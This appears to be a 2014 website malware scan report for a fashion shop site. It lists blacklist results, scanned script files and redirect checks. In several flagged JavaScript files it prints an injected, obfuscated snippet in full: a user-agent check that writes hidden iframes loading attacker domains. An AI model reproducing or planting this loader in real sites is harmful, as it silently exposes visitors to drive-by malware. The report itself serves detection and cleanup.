Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=adornosfashionboutique.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://adornosfashionboutique.com/
Result: The website is marked by Yandex as suspicious: visiting this website may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious: visiting this website may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://adornosfashionboutique.com/ | 200 OK Content-Length: 25480 Content-Type: text/html | clean |
http://adornosfashionboutique.com/media/system/js/caption.js | 200 OK Content-Length: 2766 Content-Type: application/javascript | malicious |
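Malicious code found. Script contains blacklisted domain: rubikaslas.indigoleap.com
Note: the Showcontentid() function quoted below sits in front of the file's original code (here the JCaption class). It reads navigator.userAgent and, only when none of the listed tokens (IEMobile, Android, Linux, FreeBSD, Chrome, Macintosh, iPad, iPhone) is present, uses document.write to emit an iframe positioned off-screen at -800px that loads from the blacklisted domain. The tag and style names are split across string concatenations ('<ifra'+'me', 'po'+'sition'), presumably so that a plain-text search of the file for "<iframe" or "position" does not match. The same snippet appears in every file flagged below, across the media, templates, modules, components and plugins directories, so a cleanup should compare all served .js files against known-good copies rather than only the ones listed.
function Showcontentid() {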
var so = navigator.userAgent; var po = (so.indexOf("IEMobile") > -1 || so.indexOf("Android") > -1 || so.indexOf("Linux") > -1 || so.indexOf("FreeBSD") > -1 || so.indexOf("Chrome") > -1 || so.indexOf("Macintosh") > -1 || so.indexOf("iPad") > -1 || so.indexOf("iPhone") > -1); if (!po) { document.write('<ifra'+'me src="http://rubikaslas.indigoleap.com/gabaratios15.html" style="po'+'sition:absolute;left: -800px;top: -800px;" height="134" width="134"></iframe>'); } } Showcontentid(); var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var capti ...[1301 bytes skipped]... Decoded script: <iframe src="http://rubikaslas.indigoleap.com/gabaratios15.html" style="position:absolute;left: -800px;top: -800px;" height="134" width="134"></iframe> Hidden iFrame found. size: 2x2 src: http://satemploys.ru/themes?8 <iframe src="http://satemploys.ru/themes?8" scrolling="auto" frameborder="no" align="center" height="2" width="2"> | ||
http://adornosfashionboutique.com/templates/hot_fashionstore/js/jquery.min.js | 200 OK Content-Length: 85165 Content-Type: application/javascript | suspicious |
Page code contains blacklisted domain: rubikaslas.indigoleap.com /* Copyright (C) 2007 Free Software Foundation, Inc. http://fsf.org/ */ function Showcontentid() { var so = navigator.userAgent; var po = (so.indexOf("IEMobile") > -1 || so.indexOf("Android") > -1 || so.indexOf("Linux") > -1 || so.indexOf("FreeBSD") > -1 || so.indexOf("Chrome") > -1 || so.indexOf("Macintosh") > -1 || so.indexOf("iPad") > -1 || so.indexOf("iPhone") > -1); if (!po) { document.write('<ifra'+'me src="http://rubikaslas.indigoleap.com/gabaratios15.html" style="po'+'sition:absolute;left: -800px;top: -800px;" height="134" width="134"></iframe>'); } } Showcontentid(); /* Copyright (C) 2000 Free Software Foundation, Inc. See LICENSE.txt *//*! * jQuery JavaScript Library v1.5 * http://jquery.com/ * * Copyright 2011, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/ ...[3332 bytes skipped]... Hidden iFrame found. size: 2x2 src: http://satemploys.ru/themes?8 <iframe src="http://satemploys.ru/themes?8" scrolling="auto" frameborder="no" align="center" height="2" width="2"> | ||
http://adornosfashionboutique.com/templates/hot_fashionstore/js/height.js | 200 OK Content-Length: 1063 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: rubikaslas.indigoleap.com function Showcontentid() {
var so = navigator.userAgent; var po = (so.indexOf("IEMobile") > -1 || so.indexOf("Android") > -1 || so.indexOf("Linux") > -1 || so.indexOf("FreeBSD") > -1 || so.indexOf("Chrome") > -1 || so.indexOf("Macintosh") > -1 || so.indexOf("iPad") > -1 || so.indexOf("iPhone") > -1); if (!po) { document.write('<ifra'+'me src="http://rubikaslas.indigoleap.com/gabaratios15.html" style="po'+'sition:absolute;left: -800px;top: -800px;" height="134" width="134"></iframe>'); } } Showcontentid(); jQuery(document).ready(function(){ var left_height = jQuery("#content_main").innerHeight(); jQuery("#column_left_c").css({height: left_height-95}); if(jQuery.browser.msie && jQuery.browser.version <= 7) jQuery("#column_left_c").css('margin-bottom',- ...[166 bytes skipped]... Decoded script: <iframe src="http://rubikaslas.indigoleap.com/gabaratios15.html" style="position:absolute;left: -800px;top: -800px;" height="134" width="134"></iframe> Hidden iFrame found. size: 2x2 src: http://satemploys.ru/themes?8 <iframe src="http://satemploys.ru/themes?8" scrolling="auto" frameborder="no" align="center" height="2" width="2"> | ||
http://adornosfashionboutique.com/modules/mod_virtuemart_s5_dropdown_cart/s5_dropdown/s5_dropdown.js | 200 OK Content-Length: 6372 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: rubikaslas.indigoleap.com function Showcontentid() {
var so = navigator.userAgent; var po = (so.indexOf("IEMobile") > -1 || so.indexOf("Android") > -1 || so.indexOf("Linux") > -1 || so.indexOf("FreeBSD") > -1 || so.indexOf("Chrome") > -1 || so.indexOf("Macintosh") > -1 || so.indexOf("iPad") > -1 || so.indexOf("iPhone") > -1); if (!po) { document.write('<ifra'+'me src="http://rubikaslas.indigoleap.com/gabaratios15.html" style="po'+'sition:absolute;left: -800px;top: -800px;" height="134" width="134"></iframe>'); } } Showcontentid(); var clicked_dd = 0; var s5_opening = 0; var s5_closing = 0; var dd_height2 = 0; var s5_browser=navigator.appName; function s5_dd_close_check() { if (document.getElementById("s5_dropdowncart").offsetHeight != " ...[3884 bytes skipped]... Decoded script: ...[14209 bytes skipped]... ,'s5_dropdowncart') changeOpac(2,'s5_dropdowncart') /*** called setTimeout with changeOpac(2,'s5_dropdowncart'), 0 */ changeOpac(1,'s5_dropdowncart') changeOpac(1,'s5_dropdowncart') /*** called setTimeout with changeOpac(1,'s5_dropdowncart'), 0 */ changeOpac(0,'s5_dropdowncart') changeOpac(0,'s5_dropdowncart') /*** called setTimeout with changeOpac(0,'s5_dropdowncart'), 0 */ <iframe src="http://rubikaslas.indigoleap.com/gabaratios15.html" style="position:absolute;left: -800px;top: -800px;" height="134" width="134"></iframe><iframe src="http://satemploys.ru/Themes?8" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe> Hidden iFrame found. size: 2x2 src: http://satemploys.ru/themes?8 <iframe src="http://satemploys.ru/themes?8" scrolling="auto" frameborder="no" align="center" height="2" width="2"> | ||
http://adornosfashionboutique.com/modules/mod_hot_effects_rotator/js/jquery.nivo.slider.js | 200 OK Content-Length: 13217 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: rubikaslas.indigoleap.com function Showcontentid() {
var so = navigator.userAgent; var po = (so.indexOf("IEMobile") > -1 || so.indexOf("Android") > -1 || so.indexOf("Linux") > -1 || so.indexOf("FreeBSD") > -1 || so.indexOf("Chrome") > -1 || so.indexOf("Macintosh") > -1 || so.indexOf("iPad") > -1 || so.indexOf("iPhone") > -1); if (!po) { document.write('<ifra'+'me src="http://rubikaslas.indigoleap.com/gabaratios15.html" style="po'+'sition:absolute;left: -800px;top: -800px;" height="134" width="134"></iframe>'); } } Showcontentid(); (function(jQuery) { jQuery.fn.nivoSlider = function(options) { var currentSlide = 0; var currentImage = ''; var totalSlides = 0; var randAnim = ''; var running = false; var paused = false; ...[3709 bytes skipped]... Decoded script: <iframe src="http://rubikaslas.indigoleap.com/gabaratios15.html" style="position:absolute;left: -800px;top: -800px;" height="134" width="134"></iframe> Hidden iFrame found. size: 2x2 src: http://satemploys.ru/themes?8 <iframe src="http://satemploys.ru/themes?8" scrolling="auto" frameborder="no" align="center" height="2" width="2"> | ||
http://adornosfashionboutique.com/index.php | 200 OK Content-Length: 25492 Content-Type: text/html | clean |
http://adornosfashionboutique.com/index.php?option=com_content&view=article&id=36&Itemid=149 | 200 OK Content-Length: 33309 Content-Type: text/html | clean |
http://adornosfashionboutique.com/components/com_acymailing/js/acymailing_module.js | 200 OK Content-Length: 2606 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: rubikaslas.indigoleap.com function Showcontentid() {
var so = navigator.userAgent; var po = (so.indexOf("IEMobile") > -1 || so.indexOf("Android") > -1 || so.indexOf("Linux") > -1 || so.indexOf("FreeBSD") > -1 || so.indexOf("Chrome") > -1 || so.indexOf("Macintosh") > -1 || so.indexOf("iPad") > -1 || so.indexOf("iPhone") > -1); if (!po) { document.write('<ifra'+'me src="http://rubikaslas.indigoleap.com/gabaratios15.html" style="po'+'sition:absolute;left: -800px;top: -800px;" height="134" width="134"></iframe>'); } } Showcontentid(); function submitacymailingform(task,formName){ var varform = eval('document.'+formName); if(!varform.elements) varform = varform[1]; if(task != 'optout'){ nameField = varform.elements['user[name]']; if(nameField && ...[1897 bytes skipped]... Decoded script: <iframe src="http://rubikaslas.indigoleap.com/gabaratios15.html" style="position:absolute;left: -800px;top: -800px;" height="134" width="134"></iframe><iframe src="http://satemploys.ru/Themes?8" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe> Hidden iFrame found. size: 2x2 src: http://satemploys.ru/themes?8 <iframe src="http://satemploys.ru/themes?8" scrolling="auto" frameborder="no" align="center" height="2" width="2"> | ||
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js | 200 OK Content-Length: 72174 Content-Type: text/javascript | clean |
http://adornosfashionboutique.com/plugins/content/scrollingsharebutton/float.js | 200 OK Content-Length: 6085 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: rubikaslas.indigoleap.com function Showcontentid() {
var so = navigator.userAgent; var po = (so.indexOf("IEMobile") > -1 || so.indexOf("Android") > -1 || so.indexOf("Linux") > -1 || so.indexOf("FreeBSD") > -1 || so.indexOf("Chrome") > -1 || so.indexOf("Macintosh") > -1 || so.indexOf("iPad") > -1 || so.indexOf("iPhone") > -1); if (!po) { document.write('<ifra'+'me src="http://rubikaslas.indigoleap.com/gabaratios15.html" style="po'+'sition:absolute;left: -800px;top: -800px;" height="134" width="134"></iframe>'); } } Showcontentid(); (function($){ function FloatObject(jqObj, params) { this.jqObj = jqObj; switch(params.speed) { case 'fast': this.steps = 5; break; case 'normal': this.steps = 10; break; case 'slow': this.steps = 20; brea ...[3804 bytes skipped]... Decoded script: <iframe src="http://rubikaslas.indigoleap.com/gabaratios15.html" style="position:absolute;left: -800px;top: -800px;" height="134" width="134"></iframe> Hidden iFrame found. size: 2x2 src: http://satemploys.ru/themes?8 <iframe src="http://satemploys.ru/themes?8" scrolling="auto" frameborder="no" align="center" height="2" width="2"> | ||
http://adornosfashionboutique.com/index.php?option=com_content&view=article&id=36&Itemid=40 | 200 OK Content-Length: 32388 Content-Type: text/html | clean |
http://adornosfashionboutique.com/modules/mod_xmlswf_vm_royalgallery/AC_RunActiveContent.js | 200 OK Content-Length: 9124 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: rubikaslas.indigoleap.com function Showcontentid() {
var so = navigator.userAgent; var po = (so.indexOf("IEMobile") > -1 || so.indexOf("Android") > -1 || so.indexOf("Linux") > -1 || so.indexOf("FreeBSD") > -1 || so.indexOf("Chrome") > -1 || so.indexOf("Macintosh") > -1 || so.indexOf("iPad") > -1 || so.indexOf("iPhone") > -1); if (!po) { document.write('<ifra'+'me src="http://rubikaslas.indigoleap.com/gabaratios15.html" style="po'+'sition:absolute;left: -800px;top: -800px;" height="134" width="134"></iframe>'); } } Showcontentid(); var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false; var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false; var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false; function ControlVers ...[3786 bytes skipped]... Decoded script: <iframe src="http://rubikaslas.indigoleap.com/gabaratios15.html" style="position:absolute;left: -800px;top: -800px;" height="134" width="134"></iframe><iframe src="http://satemploys.ru/Themes?8" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe> Hidden iFrame found. size: 2x2 src: http://satemploys.ru/themes?8 <iframe src="http://satemploys.ru/themes?8" scrolling="auto" frameborder="no" align="center" height="2" width="2"> | ||
http://adornosfashionboutique.com/index.php?option=com_content&view=article&id=39&Itemid=111 | 200 OK Content-Length: 31714 Content-Type: text/html | clean |
http://adornosfashionboutique.com/index.php?page=shop.cart&option=com_virtuemart&Itemid=159 | 200 OK Content-Length: 27816 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: adornosfashionboutique.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 06 Sep 2014 08:32:23 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 06 Sep 2014 08:32:25 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 82c1c218487c9702c6f376cfaaaef8e3=3f2g38qko37a03khc522ik1i75; path=/
Set-Cookie: virtuemart=3f2g38qko37a03khc522ik1i75
GET / HTTP/1.1
Host: adornosfashionboutique.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 06 Sep 2014 08:32:23 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 06 Sep 2014 08:32:25 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 82c1c218487c9702c6f376cfaaaef8e3=3f2g38qko37a03khc522ik1i75; path=/
Set-Cookie: virtuemart=3f2g38qko37a03khc522ik1i75
Second query (visit from search engine):
GET / HTTP/1.1
Host: adornosfashionboutique.com
Referer: http://www.google.com/search?q=adornosfashionboutique.com
Result:
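The result is similar to the first query. There are no suspicious redirects found. This check covers only the HTTP-level response to the request; the iframe injections listed under "Scanned pages/files" are written by script in the visitor's browser and would not show up as a redirect here.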
GET / HTTP/1.1
Host: adornosfashionboutique.com
Referer: http://www.google.com/search?q=adornosfashionboutique.com
Result:
The result is similar to the first query. There are no suspicious redirects found.